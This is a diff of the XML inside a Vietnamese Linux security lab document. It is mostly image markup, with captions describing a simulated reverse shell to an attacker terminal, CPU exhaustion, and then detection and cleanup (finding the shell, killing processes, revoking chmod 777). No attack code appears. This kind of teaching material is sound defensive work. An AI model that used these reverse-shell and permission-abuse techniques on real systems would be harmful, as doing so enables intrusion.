+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Kích hoạt Reverse shell, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>giả lập việc đã upload thành công một file script và thực thi nó để đẩy shell ngược về Terminal</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> attacker</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432591C8" wp14:editId="1C684913">
+            <wp:extent cx="5486400" cy="1797685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1762280712" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1762280712" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="1797685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Attacker gây hết CPU</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA0CD3B" wp14:editId="36851ED1">
+            <wp:extent cx="5486400" cy="3281045"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="739034783" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="739034783" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="3281045"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tìm reverse shell được thiết lập</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FDCC55" wp14:editId="730127CB">
+            <wp:extent cx="5486400" cy="466725"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="2039938020" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2039938020" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="466725"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Kiểm tra xem attacker có SSH vào được người dùng không</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E151CD" wp14:editId="08DA4741">
+            <wp:extent cx="5486400" cy="832485"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="2075191411" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2075191411" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="832485"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Rà quét các thư mục web có quyền nguy hiểm</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7484023A" wp14:editId="0756552C">
+            <wp:extent cx="4572638" cy="619211"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1137466552" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1137466552" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4572638" cy="619211"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Cắt tiến trình ngốn CPU và đường hầm cho reverse shell đi qua, đồng thời thu hồi quyền 777</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4F1863" wp14:editId="14BAC6C2">
+            <wp:extent cx="5486400" cy="793115"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
+            <wp:docPr id="616307199" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="616307199" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="793115"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
@@ -7104,7 +2562,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="FFFFFF7C"/>
     <w:multiLevelType w:val="singleLevel"/>
@@ -7240,7 +2698,7 @@
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="FFFFFF88"/>
     <w:multiLevelType w:val="singleLevel"/>
-    <w:tmpl w:val="991C349E"/>
+    <w:tmpl w:val="140A30BC"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -7258,7 +2716,7 @@
   <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="FFFFFF89"/>
     <w:multiLevelType w:val="singleLevel"/>
-    <w:tmpl w:val="76D0827E"/>
+    <w:tmpl w:val="FD54335C"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -7276,38 +2734,44 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="1">
+  <w:num w:numId="1" w16cid:durableId="1670520007">
     <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="2" w16cid:durableId="1342469762">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="3" w16cid:durableId="1461652970">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="4" w16cid:durableId="33238299">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="5" w16cid:durableId="411708198">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="6">
+  <w:num w:numId="6" w16cid:durableId="1769958048">
     <w:abstractNumId w:val="3"/>
   </w:num>
-  <w:num w:numId="7">
+  <w:num w:numId="7" w16cid:durableId="1350329959">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="8">
+  <w:num w:numId="8" w16cid:durableId="887957891">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="9">
+  <w:num w:numId="9" w16cid:durableId="745954817">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="236284387">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="773551852">
+    <w:abstractNumId w:val="7"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -7323,7 +2787,7 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
     <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
@@ -7686,6 +3150,11 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -7904,7 +3373,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/Linux/Linux_Security_Lab_Detailed.docx
+++ b/Linux/Linux_Security_Lab_Detailed.docx
@@ -34,6 +34,45 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="701CC702" wp14:editId="3AB6FB4B">
+            <wp:extent cx="5486400" cy="845820"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="591084511" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="591084511" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="845820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
@@ -87,6 +126,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD5BC9" wp14:editId="0B59F3D1">
             <wp:extent cx="5486400" cy="3696970"/>
@@ -103,7 +143,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -134,7 +174,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>mkdir linux_lab</w:t>
       </w:r>
     </w:p>
@@ -204,7 +243,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -243,6 +282,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Thấy file test.txt</w:t>
       </w:r>
     </w:p>
@@ -306,7 +346,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>LAB 2 - Permission Security</w:t>
       </w:r>
     </w:p>
@@ -317,6 +356,45 @@
       <w:r>
         <w:br/>
         <w:t>Hiểu permission và risk chmod 777</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B56910" wp14:editId="40E36D72">
+            <wp:extent cx="5486400" cy="1758950"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1698988278" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1698988278" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="1758950"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -355,6 +433,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Bước 3: Set permission nguy hiểm</w:t>
       </w:r>
     </w:p>
@@ -466,7 +545,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>+ Lộ thông tin</w:t>
       </w:r>
     </w:p>
@@ -518,6 +596,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C638816" wp14:editId="7D02DC03">
             <wp:extent cx="5039428" cy="2857899"/>
@@ -534,7 +613,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -570,6 +649,45 @@
       <w:r>
         <w:br/>
         <w:t>Theo dõi process và CPU</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C27B196" wp14:editId="32476A79">
+            <wp:extent cx="5486400" cy="2074545"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
+            <wp:docPr id="1504251447" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1504251447" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5486400" cy="2074545"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -611,7 +729,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -670,7 +788,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -725,7 +843,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -780,7 +898,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -835,7 +953,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1001,6 +1119,45 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0DB5E0" wp14:editId="72E8CB4F">
+            <wp:extent cx="5486400" cy="904240"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1069650314" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1069650314" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
